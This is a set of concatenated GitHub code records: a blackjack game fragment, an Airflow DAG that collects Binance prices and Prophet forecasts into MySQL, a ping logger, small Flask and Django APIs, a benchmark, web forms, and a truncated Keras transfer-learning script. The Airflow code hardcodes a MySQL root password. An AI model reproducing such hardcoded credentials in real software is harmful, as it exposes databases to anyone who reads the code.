self.deck.draw()]]\n self.deck.lock.release()\n\n self.bets += [self.bets[self.curr_hand]]\n self.doubled += [False]\n self.states += [ONGOING]\n\n self.credits.transfer_from_to(self.player_user, self.house_user, self.bets[self.curr_hand])\n self.net -= self.bets[self.curr_hand]\n\n self._determine_state()\n else:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS + ' to Split')\n else:\n raise InvalidSplitStateException(INVALID_SPLIT)\n\n\ndef calc_sums(cards):\n nums = []\n num_aces = 0\n for c in cards:\n if not c == 'Ace':\n if c in ['Jack', 'Queen', 'King']:\n nums += [10]\n else:\n nums += [int(c)]\n else:\n num_aces += 1\n base_sum = sum(nums)\n low_sum = base_sum\n high_sum = base_sum\n for _ in range(num_aces):\n low_sum += 1\n for _ in range(num_aces):\n if high_sum <= 10:\n high_sum += 11\n else:\n high_sum += 1\n if low_sum == high_sum:\n return (low_sum,)\n return (low_sum, high_sum)\n\n\ndef best_sum(cards):\n sums = calc_sums(cards)\n if len(sums) > 1 and sums[1] <= 21:\n return sums[1]\n return sums[0]\n","repo_name":"Barkuto/eschamali","sub_path":"cogs/gamez/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17317739343","text":"from airflow import DAG\nimport pendulum\nimport datetime\nfrom airflow.operators.python import PythonOperator\nimport random\n\nwith DAG(\n dag_id=\"get_binance02\",#DAG 아이디\n schedule_interval=\"@hourly\", #시간마다 실행\n start_date=pendulum.datetime(2023, 10, 4, tz=\"Asia/Seoul\"), #2023년 10월 4일 부터 실행\n catchup=False\n) as dag:\n\n def get_bitcoin():\n import requests #\n from datetime import datetime,timezone, timedelta\n import time\n import pytz\n import pymysql\n \n \n #현재 날짜와 시간을 가져옴 (표준시) 예) 2023-09-27 09:18:24:000\n now = datetime.now()\n print(\"now =\",str(now))\n\n #현재 날짜와 시간 2023-09-27 09:18:24:000 에서 16번째 자리까지 리턴 2023-09-27 09:18 (분까지 리턴)\n end_date_time = str(now)[:16]\n print(\"end_date_time=\",end_date_time)\n\n #현재 날짜와 시간 의 1시간 전 리턴 2023-09-27 08:18:24:000\n one_hour_ago = (now - timedelta(hours=1))\n print(\"one_hour_ago=\",str(one_hour_ago))\n\n #현재 날짜와 시간의 1시간 전의 16번째 문자열 까지 리턴 2023-09-27 08:18\n start_date_time = str(one_hour_ago)[0:16]\n print(\"start_date_time=\",start_date_time)\n\n\n #비트코인 정보를 가져올 바이넌스 API 주소\n URL = 'https://api.binance.com/api/v3/klines'\n #비트코인 종류 BTCUSDT (비트코인) ETHUSDT (이더리움)\n coin_name = \"BTCUSDT\"\n \n\n\n #문자열 형태의 end_date_time 를 date_time 으로 변환 (변환 결과는 1 초 단위)\n #변환 결과를 정수로 변환\n #변환 결과에 1000 곱해서 1/1000 단위로 변환\n #변환 결과 1초 ->1000\n\n end = int(time.mktime(datetime.strptime(end_date_time , '%Y-%m-%d %H:%M').timetuple())) * 1000\n print(\"end=\",end)\n \n #문자열 형태의 start_date_time 를 date_time 으로 변환 (변환 결과는 1 초 단위)\n #변환 결과를 정수로 변환\n #변환 결과에 1000 곱해서 1/1000 단위로 변환\n #변환 결과 1초 ->1000\n start = int(time.mktime(datetime.strptime(start_date_time , '%Y-%m-%d %H:%M').timetuple())) * 1000\n print(\"start=\",start)\n \n #바이낸스 API 파라메터 정보\n params = {\n 'symbol': coin_name, #코인 이름 BTCUSDT (비트코인) ETHUSDT (이더리움)\n 'interval': '1m', #수집 시간 간격 1m (1분), 1h (1시간)\n 'limit': 1000, #한번에 가져올 데이터의 수\n 'startTime': start, #시작 시간\n 'endTime': end #끝시간\n }\n \n #데이터베이스 연결\n db = pymysql.connect(\n host='192.168.0.171' # MySQL 이 설치된 컴퓨터 IP 주소\n ,port=3306\n ,user='root'\n ,passwd='1234'\n ,db='coin_db'\n ,charset='utf8'\n )\n \n #데이터베이스 쿼리를 실행할 객체\n cursor=db.cursor()\n \n #start 가 end 보다 작을 동안 반복\n while start < end:\n print(\"start=\",start//1000)\n #바이낵스 파라메터에 start (시작 시간 갱신)\n params['startTime'] = start\n #바이낸스 API 접속 해서 결과를 리턴\n #바이낸스 API의 결과(비트코인 가격) 은 result에 저장\n result = requests.get(URL, params = params)\n #result (비트코인 가격 1000 건)을 coin_list에 저장\n coin_list = result.json()\n #print(\"coin_list=\",coin_list)\n if not coin_list:#coin_list가 존재 하지 않으면\n break #반복 종료\n\n #coin_list에서 코인가격 하나를 coin 변수에 저장\n for coin in coin_list:\n #표준시를 서울 시간으로 변환 할 객체\n timezone = pytz.timezone('Asia/Seoul')\n\n #coin[0] : 비트코인 날짜와 시간이 정수 값으로 저장(단위 1/1000 초)\n #1초는 ->1000 으로 저장되 있으므로 1000 을 나눠서 초로 변환 한 후에\n #datetime.fromtimestamp 으로 문자열로 변환 \n # tz=timezone : 서울 시간으로 변환 \n open_time = datetime.fromtimestamp(coin[0] //1000, tz=timezone)\n print(\"open_time=\",open_time) #비트코인 날짜와 시간\n open_price = coin[1] #비트코인 시가\n print(\"open_price=\",open_price)\n high_price = coin[2] #비트코인 고가\n print(\"high_price=\",high_price)\n low_price = coin[3] #비트코인 저가\n print(\"low_price=\",low_price)\n close_price = coin[4] #비트코인 종가\n print(\"close_price=\",close_price)\n volume = coin [5] #거래량\n print(\"volume=\", volume)\n print(\"=\"*100)\n \n #open_time(비트코인 날짜와 시간)이 일치하는 행의 개수 조회하는 쿼리\n count_sql = \"select count(*) from coin where open_time=%s\"\n cursor.execute(count_sql,(open_time))\n \n #조회 결과 저장\n count = cursor.fetchall()[0][0]\n print(\"count : \", count)\n \n if count < 1: # 조회날짜가 없음\n insert_sql = \"insert into coin (open_time, open_price, high_price, low_price, close_price, volume, symbol) \"\n insert_sql +=\" values(%s, %s, %s, %s, %s, %s, %s);\" \n \n cursor.execute(insert_sql, (open_time,open_price, high_price, low_price, close_price, volume, coin_name))\n db.commit()\n \n else: # 조회날짜가 있다면\n update_sql = \"update coin set open_price=%s, high_price=%s, low_price=%s, close_price=%s, volume=%s, symbol=%s where open_time=%s;\"\n \n cursor.execute(update_sql, (open_price, high_price, low_price, close_price, volume, coin_name ,open_time))\n db.commit()\n \n #coin_list[-1][0] : 코인 리스트 마지막 행 (-1) 0번째 열 => 수집한 마지막 시간이 int 로 저장되 있음\n # 단위는 1/1000 초\n #60000 -> 60초 후 시간을 시작 시간으로 데이터 수집 \n start = coin_list[-1][0] + 60000 # 다음 step으로\n #print(\"coin_list[-1][0] + 60000 =\",coin_list[-1][0] + 60000)\n #print(\"start=\",start)\n time.sleep(1)\n \n db.close()\n\n py_t1 = PythonOperator(\n task_id='py_t1004_01', #실행할 task id\n python_callable=get_bitcoin #실행 할 함수\n )\n\n # 비트코인 가격 예측값을 DB에 저장\n def get_predict():\n import pymysql\n from prophet import Prophet\n import pandas as pd\n \n #데이터베이스 연결\n db = pymysql.connect(\n host='192.168.0.171' # MySQL 이 설치된 컴퓨터 IP 주소\n ,port=3306\n ,user='root'\n ,passwd='1234'\n ,db='coin_db'\n ,charset='utf8'\n )\n \n #데이터베이스 쿼리를 실행할 객체\n cursor=db.cursor()\n \n # 가장 최근 데이터 14400개 데이터 저장\n # 1일 : 60*24 = 1440개의 데이터 생성\n # 10일 -> 14400개\n #10일치의 비트코인 가격 조회\n \n # 날짜 데이터 ASC (오래된 데이터 -> 최근 데이터) 정렬\n sql = \"SELECT c.* FROM (SELECT open_time AS ds, close_price AS y FROM coin \" \n sql += \"ORDER BY open_time DESC limit 14400) AS c ORDER BY c.ds ASC ;\"\n \n #조회한 결과를 DataFrame에 저장\n bitcoin_df = pd.read_sql(sql, db)\n \n # prophet 의 input data columns 는 'ds'와 'y'로 고정되어야 한다.\n ## seasonality_mode : 연간, 월간, 주간, 일간 등의 트렌드성을 반영하는 것을 의미\n ### changepoint_prior_scale : 트��드가 변경되는 문맥을 반영하여 예측, 수치가 높을수록 트렌드를 더 반영\n ### 비트코인의 데이터의 경우, 대부분의 주기마다 트렌드성이 반영되는 것이 좋다.\n prophet = Prophet(\n seasonality_mode='multiplicative', # 트렌드 반영\n yearly_seasonality=True, # 연간 트렌드\n weekly_seasonality=True, # 주간 트렌드\n daily_seasonality=True, # 일간 트렌드\n changepoint_prior_scale=0.5 # 트렌드 반영 비율\n )\n \n # 예측하기 위해 기존 데이터 파악\n prophet.fit(bitcoin_df)\n\n # 1분씩 데이터 60개 (60분) 예측하도록 설정\n future_data = prophet.make_future_dataframe(periods=60, freq='min')\n \n # 비트코인 가격 예측\n forecast_data = prophet.predict(future_data) \n\n # future data 행의 수 리턴\n df_count = len(future_data)\n \n for i in range(df_count):\n # 실제 비트코인 가격 정보가 저장된 bitcoin_df 의 index 행 ds 열의 데이터 리턴\n open_time = future_data.loc[i,'ds']\n print(\"오픈 시간 : \", open_time)\n \n # 예측값이 저장된 forecast_data 의 index 행 ds 열의 데이터 리턴\n predict_price = forecast_data.loc[i,\"yhat\"]\n print(\"예측 가격 : \", predict_price)\n \n # open_time과 일치하는 시간의 레코드 개수 조회 쿼리\n count_sql = \"SELECT COUNT(*) FROM coin WHERE open_time=%s ;\"\n cursor.execute(count_sql, open_time)\n \n count= cursor.fetchall()[0][0]\n \n if count >= 1: # 존재하는 값이라면\n # 예측값이 null 인 데이터 수 조회\n predict_count_sql = \"SELECT COUNT(*) FROM coin WHERE open_time=%s AND predic_price IS NULL ;\"\n cursor.execute(predict_count_sql, open_time)\n predict_count = cursor.fetchall()[0][0]\n print(\"예측 값 수 : \", predict_count)\n \n if predict_count >= 1 : # 예측값이 null 인 값이 1개 이상 존재\n # coin 테이블에 예측값을 넣는 쿼리, 기존 null 값, update 사용\n update_sql = 'update coin set predic_price=%s where open_time=%s;'\n\n cursor.execute(update_sql,(predict_price, open_time))\n db.commit()\n \n else: # 없는 데이터라면\n insert_sql = \"insert into coin (open_time, predic_price) values(%s, %s)\"\n cursor.execute(insert_sql,(open_time, predict_price))\n db.commit()\n \n print(\"=\"*100)\n\n db.close()\n \n py_t2 = PythonOperator(\n task_id='py_t1004_02', #실행할 task id\n python_callable=get_predict #실행 할 함수\n )\n \n # py_t1 실행 후 py_t2\n py_t1 >> py_t2","repo_name":"aaingyunii/Bootcamp_BigData","sub_path":"bigdata_system/airflow/get_binance02.py","file_name":"get_binance02.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36333481218","text":"import os\nfrom datetime import datetime, timedelta, timezone\nimport subprocess\nimport random\nimport sched\nimport time\nimport csv\n\ndef Ping(host, size):\n\n command = ['ping', '-s', str(size), '-c', '1', host]\n\n process = subprocess.run(command, stdout=subprocess.PIPE)\n text = process.stdout.decode('UTF-8')\n\n print(text)\n return text\n\n\ndef Parse(text):\n\n # 100%パケットロスだったらNoneを返す\n if '100% packet loss' in text:\n return None\n\n rtt = [line for line in text.split('\\n')][-2].split(' ')[-2].split('/')[1]\n\n return rtt\n\n\ndef Size(size_max):\n\n size = size_max\n while size >= size_max:\n size = random.expovariate(0.5)\n \n return int(size * 1024)\n\n\ndef Record(host, size, rtt):\n\n #jst = timezone(timedelta(hours=+9), 'JST')\n now = datetime.now().isoformat()\n\n directory = 'data/{}/{}.csv'.format(host, now.split('T')[0])\n\n if not os.path.exists('./data/{}'.format(host)):\n os.makedirs('data/' + host)\n\n if not os.path.exists(directory):\n rows = [\n ['datetime','size','rtt'],\n [now, size, rtt]\n ]\n else:\n rows = [\n [now, size, rtt]\n ]\n\n with open(directory, mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerows(rows)\n\ndef Main():\n\n global host\n global size\n text = Ping(host, size)\n rtt = Parse(text)\n Record(host, size, rtt)\n\n\nhost = '10.254.30.254'\n\ns = sched.scheduler(time.time, time.sleep)\n\nwhile True:\n size = int(random.uniform(1, 60) * 1024)\n s.enter(60, 1, Main)\n s.run()\n","repo_name":"Sevewell/measurenet","sub_path":"measure/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33917990280","text":"from flask import Flask, request\nfrom flask_restful import Api, Resource, reqparse, abort\n\napp = Flask(__name__)\napi = Api(app)\n\ndata = {}\n\nvideo_post_args = reqparse.RequestParser()\n\nvideo_post_args.add_argument(\"name\", type=str, help=\"Enter name of video\", required=True)\nvideo_post_args.add_argument(\"likes\", type=int, help=\"Enter video likes\", required=True)\nvideo_post_args.add_argument(\"views\", type=int, help=\"Enter video views\", required=True)\n\ndef abort_id_not_found(param):\n if param not in data:\n abort(404, message = \"video ID not available\")\n\ndef abort_id_already_present(param):\n if param in data:\n abort(404, message = f\"video data already created for the id {param}\")\n\nclass Video(Resource):\n def get(self):\n param = request.args.get('id')\n abort_id_not_found(param)\n return data[param]\n \n def post(self):\n param = request.args.get('id')\n abort_id_already_present(param)\n args = video_post_args.parse_args()\n data[param] = args\n print(args)\n \n def delete(self):\n param = request.args.get('id')\n abort_id_not_found(param)\n \n\napi.add_resource(Video, \"/video/\")\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"jaglinux/python-projects","sub_path":"restAPI/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32914165822","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseNotFound\nfrom django_mako_plus import view_function\nimport json\nfrom .. import dmp_render, dmp_render_to_string\nfrom catalog import models as cmod\nfrom django import forms\nfrom formlib.form import FormMixIn\n\n@view_function\ndef process_request(request):\n # Create a list to hold the dictionaries\n dlist = []\n\n try:\n urlProduct = request.GET.get('product')\n urlCategory = request.GET.get('category')\n urlMin = request.GET.get('min-price')\n urlMax = request.GET.get('max-price')\n\n # grab all the products to begin with\n qry = cmod.Product.objects.all()\n\n\n # then filter them according to the url parameters\n if urlProduct is not None:\n qry = qry.filter(name__icontains=urlProduct)\n if urlCategory is not None:\n qry = qry.filter(category__name__icontains=urlCategory)\n if urlMin is not None:\n qry = qry.filter(price__gte=urlMin)\n if urlMax is not None:\n qry = qry.filter(price__lte=urlMax)\n\n\n\n\n # grab all products based on the above filters\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n for p in qry:\n # Create the dictionary itself, this variable will change throughout the loop\n d = {}\n d['name'] = p.name\n d['category'] = p.category.name\n d['price'] = p.price\n if hasattr(p, 'quantity'):\n d['quantity'] = p.quantity\n if hasattr(p, 'reorder_trigger'):\n d['reorder-trigger'] = p.reorder_trigger\n if hasattr(p, 'reorder_quantity'):\n d['reorder_quantity'] = p.reorder_quantity\n if hasattr(p, 'serial_number'):\n d['serial_number'] = p.serial_number\n dlist.append(d)\n except:\n #return HttpResponseNotFound('Invalid Details')\n dlist = [{'Error in the api call'}]\n\n print('------- d list: ', dlist)\n\n [ { 'error': '...' }, ]\n\n # return HttpResponse(json.dumps(ret), content_type='application/json')\n return JsonResponse(dlist, safe=False)\n #wrap a list into a dictionary and return that \n","repo_name":"Akokixav/Sprint_3","sub_path":"fomo/api/views/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36088048315","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport time\n\nimport torch\nfrom spatial_correlation_sampler import SpatialCorrelationSampler\nfrom tqdm import trange\n\nTIME_SCALES = {'s': 1, 'ms': 1000, 'us': 1000000}\n\nparser = argparse.ArgumentParser()\nparser.add_argument('backend', choices=['cpu', 'cuda'], default='cuda')\nparser.add_argument('-b', '--batch-size', type=int, default=16)\nparser.add_argument('-k', '--kernel-size', type=int, default=3)\nparser.add_argument('--patch', type=int, default=3)\nparser.add_argument('--patch_dilation', type=int, default=2)\nparser.add_argument('-c', '--channel', type=int, default=64)\nparser.add_argument('--height', type=int, default=100)\nparser.add_argument('-w', '--width', type=int, default=100)\nparser.add_argument('-s', '--stride', type=int, default=2)\nparser.add_argument('-p', '--pad', type=int, default=1)\nparser.add_argument('--scale', choices=['s', 'ms', 'us'], default='us')\nparser.add_argument('-r', '--runs', type=int, default=100)\nparser.add_argument('--dilation', type=int, default=2)\nparser.add_argument('-d', '--dtype', choices=['half', 'float', 'double'])\n\nargs = parser.parse_args()\n\ndevice = torch.device(args.backend)\n\nif args.dtype == 'half':\n dtype = torch.float16\nelif args.dtype == 'float':\n dtype = torch.float32\nelse:\n dtype = torch.float64\n\n\ninput1 = torch.randn(args.batch_size,\n args.channel,\n args.height,\n args.width,\n dtype=dtype,\n device=device,\n requires_grad=True)\ninput2 = torch.randn_like(input1)\n\ncorrelation_sampler = SpatialCorrelationSampler(\n args.kernel_size,\n args.patch,\n args.stride,\n args.pad,\n args.dilation,\n args.patch_dilation)\n\n# Force CUDA initialization\noutput = correlation_sampler(input1, input2)\nprint(output.size())\noutput.mean().backward()\nforward_min = float('inf')\nforward_time = 0\nbackward_min = float('inf')\nbackward_time = 0\nfor _ in trange(args.runs):\n correlation_sampler.zero_grad()\n\n start = time.time()\n output = correlation_sampler(input1, input2)\n elapsed = time.time() - start\n forward_min = min(forward_min, elapsed)\n forward_time += elapsed\n output = output.mean()\n\n start = time.time()\n (output.mean()).backward()\n elapsed = time.time() - start\n backward_min = min(backward_min, elapsed)\n backward_time += elapsed\n\nscale = TIME_SCALES[args.scale]\nforward_min *= scale\nbackward_min *= scale\nforward_average = forward_time / args.runs * scale\nbackward_average = backward_time / args.runs * scale\n\nprint('Forward: {0:.3f}/{1:.3f} {4} | Backward {2:.3f}/{3:.3f} {4}'.format(\n forward_min, forward_average, backward_min, backward_average,\n args.scale))\n","repo_name":"jiawen-zhu/HQTrack","sub_path":"packages/Pytorch-Correlation-extension/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":706,"dataset":"github-code","pt":"40"} +{"seq_id":"36579699699","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, SelectField, DecimalField \\\n ,SelectMultipleField, widgets\nfrom wtforms.validators import DataRequired, Length\n\nwksht_codes = [('A000000','A'),('A10000','A-1'),('A200000','A-2'),('A30000A','A-3 Part A'),\n ('A30000B','A-3 Part B'),('A30000C','A-3 Part C'),('A400001','A-4 Part 1'),\n ('A400002','A-4 Part 2'),('B000000','B'),('B100000','B-1'),('C000000','C'),\n ('D000000','D'),('E000001','E Part 1'),('E000002','E Part 2'),('E100001','E-1 Part 1'),\n ('E100002','E-1 Part 2'),('F000000','F'),('F100000','F-1'),('S000001','S Part 1'),\n ('S000002','S Part 2'),('S000003','S Part 3'),('S100000','S-1'),('S200000','S-2')]\n\nfac_info_choices = [('medicare_id','Medicare ID'),('facility_name','Facility Name'),('address','Address'),\n ('city','City'),('county','County'),('zip_code','Zip Code'),('state','State'),\n ('non_for_profit','Non/For-Profit'),('dialysis_chain','Dialysis Chain')]\n\nutilization_choices = [('hemodialysis_treatments','Hemodialysis Treatments'),('peritoneal_treatments','Peritoneal Treatments'),\n ('home_hemo_treatments','Home Hemodialysis Treatments'),('home_peritoneal_treatment','Home Peritoneal Treatments'),\n ('total_treatments','Total Treatments'),('hemodialysis_patients','Hemodialysis Patients'),\n ('peritoneal_patients','Peritoneal Patients'),('home_dialysis_patients','Home Dialysis Patients'),\n ('transplant_received','Transplants Recieved'),('transplant_waitlist','Patients on Transplant Waitlist')]\n\nstaff_choices = [('physicians','Physicians'),('registered_nurses','Registered Nurses'),\n ('licensed_practical_nurses','Licensed Practical Nurses'),('nurses_aides','Nurses Aides'),\n ('technicians','Technicians'),('social_workers','Social Workers'),('dieticians','Dieticians'),\n ('administrative','Administrative'),('management','Management'),('other','Other')]\n\nfinance_choices = [('net_patient_revenue','Net Patient Revenue'),('operating_expenses','Operating Expenses'),\n ('net_income_patient_services','Net Income Patient Services'),('covid_19_income','Covid-19 Income'),\n ('other_income','Other Income'),('net_income','Net Income')]\n\nstate_choices = ['AK','AL', 'AR','AS','AZ','CA','CO','CT','DC','DE','FL','GA','GU','HI','IA','ID','IL' \n ,'IN','KS','KY','LA','MA','MD','ME','MI','MN','MO','MP','MS','MT','NC','ND','NE','NH'\n ,'NJ','NM','NV','NY','OH','OK','OR','PA','PR','RI','SC','SD','TN','TX','UT','VA','VI'\n ,'VT','WA','WI','WV','WY']\n\nchain_choices = [('DAVITA INC','DaVita Inc'),('FRESENIUS MEDICAL CARE N.A.','Fresenius Medical Care'),\n ('U.S. RENAL CARE INC.','US Renal Care'),('DIALYSIS CLINIC INC.','Dialysis Clinic Inc'),\n ('AMERICAN RENAL ASSOCIATES INC.','American Renal Associates Inc'),('SATELLITE HEALTHCARE INC.','Satellite Healthcare Inc'),\n ('UNIVERSITY OF UTAH','University of Utah'),('CENTERS FOR DIALYSIS CARE','Centers for Dialysis Care'),\n ('NORTHWEST KIDNEY CENTERS','Northwest Kidney Centers'),('WAKE FOREST UNIVERSITY','Wake Forest University'),\n ('DIALYZE HOLDINGS LLC','Dialyze Holdings LLC'),('PURE LIFE RENAL INC.','Pure Life Renal Inc'),\n ('GREENFIELD HEALTH SYSTEMS','Greenfield Health Systems'),('CA DIALYSIS MANAGEMENT SVCS INC','CA Dialysis Management Services Inc')]\n#forms for custom data\nclass FieldsForm(FlaskForm):\n worksheet = SelectField('Worksheet Code',choices = wksht_codes, validators=[DataRequired()])\n line_number = DecimalField('Line Number', places=2, validators=[DataRequired()])\n column_number = DecimalField('Column Number', places=2,validators=[DataRequired()])\n var_name = StringField('Variable Name', validators=[DataRequired(),Length(min=0,max=40)])\n submit = SubmitField('+ Add to Cart')\n \nclass ClearForm(FlaskForm):\n clear = SubmitField('Clear All', validators=[DataRequired()])\n\nclass DownloadForm(FlaskForm):\n download = SubmitField('Download Dataset', validators=[DataRequired()])\n\n#forms for preset data\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput()\n\nclass PresetInfoForm(FlaskForm):\n facility_info = MultiCheckboxField('Facility Information', choices=fac_info_choices)\n utilization = MultiCheckboxField('Utilization Data', choices = utilization_choices)\n finance = MultiCheckboxField('Financial Statement', choices = finance_choices)\n staff = MultiCheckboxField('Employee Data', choices=staff_choices)\n submit = SubmitField('+ Add Variables')\n\nclass FacFilterForm(FlaskForm):\n years = [(i,i) for i in range(2022,2010,-1)]\n year_field = MultiCheckboxField('Year', choices=years)\n states = [(i,i) for i in state_choices]\n state_field = MultiCheckboxField('State/Territory', choices=states)\n chain_field = MultiCheckboxField('Dialysis Chain', choices=chain_choices)\n submit = SubmitField('+ Add Criteria')\n\n\"\"\"\nclass WorksheetForm(FlaskForm):\n worksheet = SelectField('Worksheet Code', choices = wksht_codes, validators=[DataRequired()])\n submit = SubmitField('Submit')\n\"\"\"\n","repo_name":"alogemann/open-hospital-data","sub_path":"app_package/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14666790227","text":"# -*- coding: utf-8 -*-\n# @Author: romaingautronapt\n# @Date: 2018-01-15 14:59:20\n# @Last modified by: Luc Blassel\n# @Last modified time: 2018-01-28T17:23:09+01:00\n\"\"\"\ninspired by https://blog.keras.io/building-powerful-image-classification-models-using-very-little-data.html\n\"\"\"\nimport numpy as np\nimport time\nimport os.path\nfrom binariser import *\nfrom dataProcessing import *\nfrom keras import applications\nfrom keras import optimizers\nfrom keras.models import Sequential, Model, load_model\nfrom keras.layers import Flatten, Dense, Dropout, GlobalAveragePooling2D, Conv2D, MaxPooling2D, Activation\nfrom keras import backend as k\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom callbackBoosting import *\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom dataLoader import *\nfrom pathlib import Path\nfrom keras.utils.np_utils import to_categorical\nimport pandas as pd\nimport copy as cp\nimport _pickle as pickle\nfrom itertools import chain\n\ndownloader(url,path)\nmodels_path = \"models\"\n\n# checks if models directory already exists, and iuf not creates it\n\ndataPath = models_path\nif not os.path.exists(dataPath):\n\tprint(\"creating\" ,dataPath, \"directory\")\n\tos.makedirs(dataPath)\n\n\n#####################################\n# BUILDING MODEL FOR TWO CLASSES #\n#####################################\n\ndef bottom_layers_builder(originalSize,resizeFactor):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\tif k.image_data_format() == 'channels_first':\n\t\tinput_shape = (3, img_size, img_size)\n\telse:\n\t\tinput_shape = (img_size, img_size, 3)\n\n\t#model = applications.InceptionV3(weights = \"imagenet\", include_top=False, input_shape = (img_size, img_size, 3))\n\tmodel = applications.Xception(weights = \"imagenet\", include_top=False, input_shape = input_shape)\n\n\tfor layer in model.layers :\n\t\tlayer.trainable = False\n\treturn model\n\ndef create_generators(classes,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size,transformation_ratio):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\ttrain_datagen = ImageDataGenerator(rescale=1. / 255,\n\t\t\t\t\t\t\t\t\t rotation_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t shear_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t zoom_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t cval=transformation_ratio,\n\t\t\t\t\t\t\t\t\t horizontal_flip=True,\n\t\t\t\t\t\t\t\t\t vertical_flip=True)\n\n\tvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttest_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttrain_generator = train_datagen.flow_from_directory(path_to_train,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tbatch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclasses = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle = False)\n\n\tvalidation_generator = validation_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\n\ttest_generator = test_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\n\treturn train_generator,validation_generator,test_generator\n\ndef save_bottleneck_features(model,train_generator,validation_generator,test_generator,trainNum,valNum,testNum,batch_size,recompute_transfer_values):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tfile1 = Path('bottleneck_features_train.npy')\n\tif not file1.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_train.npy')\n\t\tbottleneck_features_train = model.predict_generator(train_generator, trainNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_train.npy', 'wb'), bottleneck_features_train)\n\n\n\tfile2 = Path('bottleneck_features_val.npy')\n\tif not file2.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_val.npy')\n\t\tbottleneck_features_val = model.predict_generator(validation_generator, valNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_val.npy', 'wb'), bottleneck_features_val)\n\n\tfile3 = Path('bottleneck_features_test.npy')\n\tif not file3.is_file() or recompute_transfer_values:\n\t\tprint('bottleneck_features_test.npy')\n\t\tbottleneck_features_test = model.predict_generator(test_generator, testNum // batch_size, use_multiprocessing=False, verbose=1)\n\t\tnp.save(open('bottleneck_features_test.npy', 'wb'), bottleneck_features_test)\n\ndef top_layer_builder(lr,num_of_classes):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttrain_data = np.load(open('bottleneck_features_train.npy',\"rb\"))\n\tmodel = Sequential()\n\tmodel.add(Flatten(input_shape=train_data.shape[1:]))\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(512, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n\t#model.compile(optimizer='rmsprop',loss='binary_crossentropy',metrics=['accuracy'])\n\tmodel.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\treturn model\n\ndef top_layer_trainer(train_top_model,top_model,epochs,batch_size,trainNum,valNum,testNum,lr,train_generator,validation_generator,test_generator,path_to_best_model):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tfile_exists = False\n\tfile = Path(path_to_best_model)\n\tif file.is_file():\n\t\tfile_exists = True\n\n\tif not file_exists or train_top_model :\n\t\ttrain_data = np.load(open('bottleneck_features_train.npy',\"rb\"))\n\n\t\tvalidation_data = 